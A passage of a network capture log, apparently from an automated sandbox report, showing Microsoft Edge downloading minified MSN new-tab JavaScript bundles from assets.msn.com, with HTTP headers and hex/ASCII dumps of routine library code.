2024-11-21 21:13:10 UTC	1390	IN	Data Raw: c1 c2 b3 df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 Data Ascii: to@Fi'W\|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG\|P_CjB5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6g Ad/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	50014	23.44.203.17	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:11 UTC	627	OUT	GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ntp.msn.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 21:13:12 UTC	1239	IN	HTTP/1.1 200 OK Content-Type: application/javascript Content-MD5: 2o3TH2IeNXyf9OP87xu6FA== Last-Modified: Fri, 15 Nov 2024 22:31:11 GMT ETag: 0x8DD05C53565F83D Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 64e866d1-101e-0037-3246-3988b3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Thu, 21 Nov 2024 21:13:12 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.195.36.241,b=476362431,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.195.36.241 Akamai-Request-ID: 1c64b6bf Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Cache-Control: public, no-transform, max-age=31535892 Timing-Allow-Origin: * Akamai-GRN: 0.f124c317.1732223592.1c64b6bf Vary: Origin
2024-11-21 21:13:12 UTC	15145	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 76 65 6e 64 6f 72 73 2e 37 65 32 37 63 63 61 36 30 32 37 62 38 64 36 36 39 37 63 62 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 22 5d 2c 7b 37 33 30 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 74 2e 65 78 70 6f 72 74 73 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 48 74 74 70 73 41 67 65 6e 74 3d 65 7d 2c 31 33 30 31 Data Ascii: 00006000/! For license information please see vendors.7e27cca6027b8d6697cb.js.LICENSE.txt /(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks\|\|[]).push([["vendors"],{73040:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},1301
2024-11-21 21:13:12 UTC	9443	IN	Data Raw: 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5c 5c 64 7b 34 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 34 2b 65 29 2b 22 7d 29 7c 28 5c 5c 64 7b 32 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 32 2b 65 29 2b 22 7d 29 24 29 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 7b 79 65 61 72 3a 4e 61 4e 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 22 22 7d 3b 76 61 72 20 69 3d 72 5b 31 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 31 5d 29 3a 6e 75 6c 6c 2c 6f 3d 72 5b 32 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 32 5d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 6e 75 6c 6c 3d 3d 3d 6f 3f 69 3a 31 30 30 2a 6f 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 74 2e 73 6c 69 63 65 28 Data Ascii: ion(t,e){var n=new RegExp("^(?:(\\d{4}\|[+-]\\d{"+(4+e)+"})\|(\\d{2}\|[+-]\\d{"+(2+e)+"})$)"),r=t.match(n);if(!r)return{year:NaN,restDateString:""};var i=r[1]?parseInt(r[1]):null,o=r[2]?parseInt(r[2]):null;return{year:null===o?i:100*o,restDateString:t.slice(
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 75 78 2f 22 29 7d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 5b 6e 5d 3d 74 5b 6e 5d 7d 29 29 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 28 72 29 29 7b 76 61 72 20 69 3d 74 28 72 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 69 7d 72 65 74 75 72 6e 7b 7d 7d 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 6e 7d 2c 66 3d 22 52 4f 4f 54 22 2c 6c 3d 22 4e 41 4d 45 53 50 41 43 45 5f 52 4f 4f 54 22 2c 76 3d 22 43 48 49 4c 44 22 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 Data Ascii: 00006000ux/")},a=function(t,e){return Object.keys(t).forEach((function(n){return e[n]=t[n]}))},s=function(t,e){var n=function n(r){if(e(r)){var i=t(r);return a(t,n),i}return{}};return a(t,n),n},f="ROOT",l="NAMESPACE_ROOT",v="CHILD",d=function(t){return
2024-11-21 21:13:12 UTC	8204	IN	Data Raw: 65 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 38 7c 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 32 7c 28 6e 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 3c 3c 36 7c 28 72 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 2c 69 2b 3d 36 34 3d 3d 3d 6e 3f 64 28 65 3e 3e 31 36 26 32 35 35 29 3a 36 34 3d 3d 3d 72 3f 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 29 3a 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 2c 32 35 35 26 65 29 3b 72 65 74 75 72 6e 20 69 7d 2c 4e 3d 6f 3f 74 3d 3e 61 74 6f 62 28 67 28 74 29 29 3a 63 3f 74 3d 3e 42 75 66 66 65 72 2e 66 72 6f 6d 28 74 2c 22 62 61 73 65 36 34 22 29 2e 74 6f 53 74 72 69 6e 67 28 22 62 69 6e 61 72 79 22 29 3a 4c 2c 44 3d 63 3f 74 3d 3e 70 Data Ascii: e=l[t.charAt(o++)]<<18\|l[t.charAt(o++)]<<12\|(n=l[t.charAt(o++)])<<6\|(r=l[t.charAt(o++)]),i+=64===n?d(e>>16&255):64===r?d(e>>16&255,e>>8&255):d(e>>16&255,e>>8&255,255&e);return i},N=o?t=>atob(g(t)):c?t=>Buffer.from(t,"base64").toString("binary"):L,D=c?t=>p
2024-11-21 21:13:12 UTC	2479	IN	Data Raw: 30 30 30 30 30 39 41 33 0d 0a 72 63 65 2c 45 2e 65 78 65 63 28 74 29 29 3b 72 65 74 75 72 6e 20 65 2e 6c 61 73 74 49 6e 64 65 78 3d 74 2e 6c 61 73 74 49 6e 64 65 78 2c 65 7d 2c 78 3d 6e 28 35 36 31 33 37 29 2c 5f 3d 78 2e 5a 3f 78 2e 5a 2e 70 72 6f 74 6f 74 79 70 65 3a 76 6f 69 64 20 30 2c 53 3d 5f 3f 5f 2e 76 61 6c 75 65 4f 66 3a 76 6f 69 64 20 30 3b 76 61 72 20 54 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 3f 4f 62 6a 65 63 74 28 53 2e 63 61 6c 6c 28 74 29 29 3a 7b 7d 7d 2c 4c 3d 6e 28 39 37 35 35 38 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d Data Ascii: 000009A3rce,E.exec(t));return e.lastIndex=t.lastIndex,e},x=n(56137),_=x.Z?x.Z.prototype:void 0,S=_?_.valueOf:void 0;var T=function(t){return S?Object(S.call(t)):{}},L=n(97558);var N=function(t,e,n){var r=t.constructor;switch(e){case"[object ArrayBuffer]
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 3d 6e 28 37 31 31 35 35 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 73 29 7b 76 61 72 20 66 3d 2d 31 2c 6c 3d 69 2e 5a 2c 76 3d 21 30 2c 64 3d 74 2e 6c 65 6e 67 74 68 2c 70 3d 5b 5d 2c 68 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 21 64 29 72 65 74 75 72 6e 20 70 3b 6e 26 26 28 65 3d 28 30 2c 75 2e 5a 29 28 65 2c 28 30 2c 63 2e 5a 29 28 6e 29 29 29 2c 73 3f 28 6c 3d 6f 2e 5a 2c 76 3d 21 31 29 3a 65 2e 6c 65 6e 67 74 68 3e 3d 32 30 30 26 26 28 6c 3d 61 2e 5a 2c 76 3d 21 31 2c 65 3d 6e 65 77 20 72 2e 5a 28 65 29 29 3b 74 3a 66 6f 72 28 3b 2b 2b 66 3c 64 3b 29 7b 76 61 72 20 67 3d 74 5b 66 5d 2c 5a 3d 6e 75 6c 6c 3d 3d 6e 3f 67 3a 6e 28 67 29 3b 69 66 28 67 3d 73 7c 7c 30 21 3d 3d 67 3f 67 3a 30 2c 76 26 26 5a 3d Data Ascii: 00004000=n(71155);e.Z=function(t,e,n,s){var f=-1,l=i.Z,v=!0,d=t.length,p=[],h=e.length;if(!d)return p;n&&(e=(0,u.Z)(e,(0,c.Z)(n))),s?(l=o.Z,v=!1):e.length>=200&&(l=a.Z,v=!1,e=new r.Z(e));t:for(;++f<d;){var g=t[f],Z=null==n?g:n(g);if(g=s\|\|0!==g?g:0,v&&Z=
2024-11-21 21:13:12 UTC	12	IN	Data Raw: 6e 3a 64 65 6c 65 74 65 20 74 0d 0a Data Ascii: n:delete t
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 5b 63 5d 29 2c 69 7d 7d 2c 38 37 33 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 30 33 32 33 29 2c 69 3d 6e 28 33 36 31 32 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 75 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 63 3d 75 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 5b 5d 3a 28 74 3d 4f 62 6a 65 63 74 28 74 29 2c 28 30 2c 72 2e 5a 29 28 75 28 74 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 2c 65 29 7d 29 29 29 7d 3a 69 2e 5a 3b 65 2e 5a 3d Data Ascii: 00004000[c]),i}},87339:function(t,e,n){"use strict";var r=n(80323),i=n(3612),o=Object.prototype.propertyIsEnumerable,u=Object.getOwnPropertySymbols,c=u?function(t){return null==t?[]:(t=Object(t),(0,r.Z)(u(t),(function(e){return o.call(t,e)})))}:i.Z;e.Z=
2024-11-21 21:13:12 UTC	12	IN	Data Raw: 3d 3d 74 79 70 65 6f 66 20 74 0d 0a Data Ascii: ==typeof t
2024-11-21 21:13:12 UTC	15599	IN	Data Raw: 30 30 30 30 33 43 45 33 0d 0a 7d 7d 2c 34 34 31 39 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 38 35 31 30 29 2c 69 3d 6e 28 31 32 35 34 35 29 2c 6f 3d 6e 28 32 35 31 39 37 29 2c 75 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2c 63 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 61 3d 75 2e 74 6f 53 74 72 69 6e 67 2c 73 3d 63 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 66 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 28 30 2c 6f 2e 5a 29 28 74 29 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 28 30 2c 72 2e 5a 29 28 74 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 28 30 2c 69 Data Ascii: 00003CE3}},44199:function(t,e,n){"use strict";var r=n(48510),i=n(12545),o=n(25197),u=Function.prototype,c=Object.prototype,a=u.toString,s=c.hasOwnProperty,f=a.call(Object);e.Z=function(t){if(!(0,o.Z)(t)\|\|"[object Object]"!=(0,r.Z)(t))return!1;var e=(0,i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50016	23.44.203.17	443	4408	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 21:13:11 UTC	629	OUT	GET /bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.js HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ntp.msn.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 21:13:12 UTC	1239	IN	HTTP/1.1 200 OK Content-Type: application/javascript Content-MD5: HCbv7Xblg3hSGHB1/o489Q== Last-Modified: Thu, 14 Nov 2024 20:43:38 GMT ETag: 0x8DD04ED0434B3A9 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 564bdfaa-f01e-0086-6351-3796a6000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Thu, 21 Nov 2024 21:13:12 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.195.36.239,b=707689213,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.195.36.239 Akamai-Request-ID: 2a2e7afd Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Cache-Control: public, no-transform, max-age=31535892 Timing-Allow-Origin: * Akamai-GRN: 0.ef24c317.1732223592.2a2e7afd Vary: Origin
2024-11-21 21:13:12 UTC	15145	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6d 69 63 72 6f 73 6f 66 74 2e 34 38 31 33 32 65 35 34 32 37 64 65 62 39 37 31 65 65 32 38 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 6d 69 63 72 6f 73 6f 66 74 22 5d 2c 7b 36 33 31 36 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 76 Data Ascii: 00006000/! For license information please see microsoft.48132e5427deb971ee28.js.LICENSE.txt /(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks\|\|[]).push([["microsoft"],{63165:function(t,e,n){"use strict";n.d(e,{Z:function(){return A}});v
2024-11-21 21:13:12 UTC	9443	IN	Data Raw: 36 2c 72 2e 62 24 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 6d 66 2c 6f 2e 6b 4a 2c 6f 2e 4b 6e 2c 6f 2e 6e 64 2c 72 2e 4d 46 2c 6f 2e 59 36 2c 72 2e 63 70 2c 73 2e 70 37 2c 73 2e 55 59 2c 6f 2e 6c 5f 2c 6c 2e 63 39 2c 6c 2e 49 62 2c 6f 2e 49 64 2c 6f 2e 72 57 2c 6f 2e 59 6d 2c 6f 2e 6f 38 2c 6f 2e 6c 65 2c 6f 2e 6e 72 2c 6f 2e 6d 66 2c 6f 2e 4b 6e 2c 6f 2e 4a 5f 2c 6f 2e 6b 4a 2c 6f 2e 56 5a 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 59 36 2c 6f 2e 74 4f 2c 6f 2e 55 41 2c 6f 2e 4d 72 2c 6f 2e 58 7a 2c 6f 2e 6e 64 2c 64 2e 70 75 2c 6f 2e 46 59 2c 6f 2e 6c 5f 2c 6c 2e 49 62 2c 6f 2e 6d 36 2c 72 2e 77 31 2c 61 2e 47 57 2c 61 2e 4a 6a 2c 75 2e 70 5a 2c 75 2e 61 7a 2c 75 2e 5f 6c 2c 75 2e 43 4e 2c 75 2e 46 36 2c 61 2e 44 4f 3b 66 75 6e Data Ascii: 6,r.b$,o.HD,o.hj,o.jn,o.mf,o.kJ,o.Kn,o.nd,r.MF,o.Y6,r.cp,s.p7,s.UY,o.l_,l.c9,l.Ib,o.Id,o.rW,o.Ym,o.o8,o.le,o.nr,o.mf,o.Kn,o.J_,o.kJ,o.VZ,o.HD,o.hj,o.jn,o.Y6,o.tO,o.UA,o.Mr,o.Xz,o.nd,d.pu,o.FY,o.l_,l.Ib,o.m6,r.w1,a.GW,a.Jj,u.pZ,u.az,u._l,u.CN,u.F6,a.DO;fun
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 33 39 38 0d 0a 65 5b 72 2e 4d 57 5d 28 61 29 2c 31 3d 3d 3d 65 3f 74 5b 63 2e 79 73 5d 28 73 29 3a 74 5b 63 2e 63 4c 5d 28 73 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 6e 29 7b 76 61 72 20 69 3d 28 30 2c 6f 2e 6a 29 28 65 7c 7c 7b 7d 29 3b 69 26 26 69 5b 72 2e 6d 63 5d 26 26 69 5b 72 2e 6d 63 5d 28 74 2c 6e 29 7d 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6c 6f 67 67 69 6e 67 4c 65 76 65 6c 43 6f 6e 73 6f 6c 65 2c 30 29 2c 6c 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6c 6f 67 67 69 6e 67 4c 65 76 65 6c 54 65 6c 65 6d 65 74 72 79 2c 31 29 2c 68 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6d 61 78 4d 65 73 73 61 67 65 4c 69 6d 69 74 2c 32 35 29 2c 66 3d 28 30 2c 61 2e 76 34 29 28 74 5b 72 2e 46 72 5d 2c 21 31 29 Data Ascii: 00004398e[r.MW](a),1===e?t[c.ys](s):t[c.cL](s)}}}function v(t,n){var i=(0,o.j)(e\|\|{});i&&i[r.mc]&&i[r.mc](t,n)}!function(t){n=(0,a.v4)(t.loggingLevelConsole,0),l=(0,a.v4)(t.loggingLevelTelemetry,1),h=(0,a.v4)(t.maxMessageLimit,25),f=(0,a.v4)(t[r.Fr],!1)
2024-11-21 21:13:12 UTC	932	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6f 2e 5f 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 65 26 26 65 2e 75 6e 6c 6f 61 64 28 61 2c 74 29 2c 21 65 7d 2c 61 5b 69 2e 7a 56 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 6e 75 6c 6c 29 2c 28 30 2c 73 2e 6b 4a 29 28 74 29 26 26 28 74 3d 62 28 74 2c 72 2c 65 2c 6e 29 29 2c 76 28 74 7c 7c 61 5b 69 2e 57 32 5d 28 29 2c 65 2c 6e 29 7d 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 65 5b 69 2e 54 43 5d 7c 7c 7b 7d 2c 6f 3d 70 28 74 2c 72 2c 65 2c 6e 29 2e 63 74 78 3b 72 65 74 75 72 6e 20 6f 5b 69 2e 75 4c 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6f 2e 69 74 65 72 61 74 65 28 28 66 Data Ascii: unction(t){var e=o._next();return e&&e.unload(a,t),!e},a[i.zV]=function(t,n){return void 0===t&&(t=null),(0,s.kJ)(t)&&(t=b(t,r,e,n)),v(t\|\|a[i.W2](),e,n)},a}function m(t,e,n){var r=e[i.TC]\|\|{},o=p(t,r,e,n).ctx;return o[i.uL]=function(t){return o.iterate((f
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 64 5d 3b 72 65 74 75 72 6e 20 6d 7c 7c 28 6d 3d 65 5b 64 5d 3d 7b 7d 29 2c 65 2e 73 65 74 4e 65 78 74 28 76 29 2c 74 26 26 28 30 2c 63 2e 4c 6d 29 28 65 5b 61 2e 6f 56 5d 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2b 22 3a 22 2b 73 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 5b 70 5d 3d 21 30 3b 74 72 79 7b 76 61 72 20 74 3d 76 3f 76 2e 5f 69 64 3a 61 2e 71 53 3b 74 26 26 28 6d 5b 74 5d 3d 21 31 29 2c 66 3d 6e 28 65 29 7d 63 61 74 63 68 28 74 29 7b 76 61 72 20 63 3d 21 76 7c 7c 6d 5b 76 2e 5f 69 64 5d 3b 63 26 26 28 66 3d 21 30 29 2c 76 26 26 63 7c 7c 28 30 2c 72 2e 6b 50 29 28 65 5b 69 2e 6d 63 5d 28 29 2c 31 2c 37 33 2c 22 50 6c 75 67 69 6e 20 5b 22 2b 67 2b 22 5d 20 66 61 69 6c 65 64 20 64 75 Data Ascii: 00004000d];return m\|\|(m=e[d]={}),e.setNext(v),t&&(0,c.Lm)(e[a.oV](),(function(){return g+":"+s}),(function(){m[p]=!0;try{var t=v?v._id:a.qS;t&&(m[t]=!1),f=n(e)}catch(t){var c=!v\|\|m[v._id];c&&(f=!0),v&&c\|\|(0,r.kP)(e[i.mc](),1,73,"Plugin ["+g+"] failed du
2024-11-21 21:13:12 UTC	12	IN	Data Raw: 54 79 70 65 5d 3b 21 76 74 28 0d 0a Data Ascii: Type];!vt(
2024-11-21 21:13:12 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 65 2e 73 65 6e 64 54 79 70 65 29 26 26 65 2e 69 73 42 65 61 63 6f 6e 26 26 32 3d 3d 3d 65 2e 73 65 6e 64 52 65 61 73 6f 6e 26 26 28 67 3d 70 5b 32 5d 7c 7c 70 5b 33 5d 7c 7c 67 29 3b 76 61 72 20 76 3d 64 74 3b 28 65 2e 69 73 42 65 61 63 6f 6e 7c 7c 33 3d 3d 3d 67 2e 5f 74 72 61 6e 73 70 6f 72 74 29 26 26 28 76 3d 21 31 29 3b 76 61 72 20 6d 3d 6b 74 28 65 2c 76 29 3b 76 3d 76 7c 7c 6d 2e 75 73 65 48 64 72 73 3b 76 61 72 20 62 3d 28 30 2c 63 2e 68 4b 29 28 29 3b 28 30 2c 6f 2e 4c 6d 29 28 79 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 48 74 74 70 4d 61 6e 61 67 65 72 3a 5f 64 6f 50 61 79 6c 6f 61 64 53 65 6e 64 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 70 3d 30 3b 70 3c 65 2e 62 61 Data Ascii: 00004000e.sendType)&&e.isBeacon&&2===e.sendReason&&(g=p[2]\|\|p[3]\|\|g);var v=dt;(e.isBeacon\|\|3===g._transport)&&(v=!1);var m=kt(e,v);v=v\|\|m.useHdrs;var b=(0,c.hK)();(0,o.Lm)(y,(function(){return"HttpManager:_doPayloadSend"}),(function(){for(var p=0;p<e.ba
2024-11-21 21:13:12 UTC	12	IN	Data Raw: 22 7c 22 29 3b 69 2e 6c 65 6e 0d 0a Data Ascii: "\|");i.len
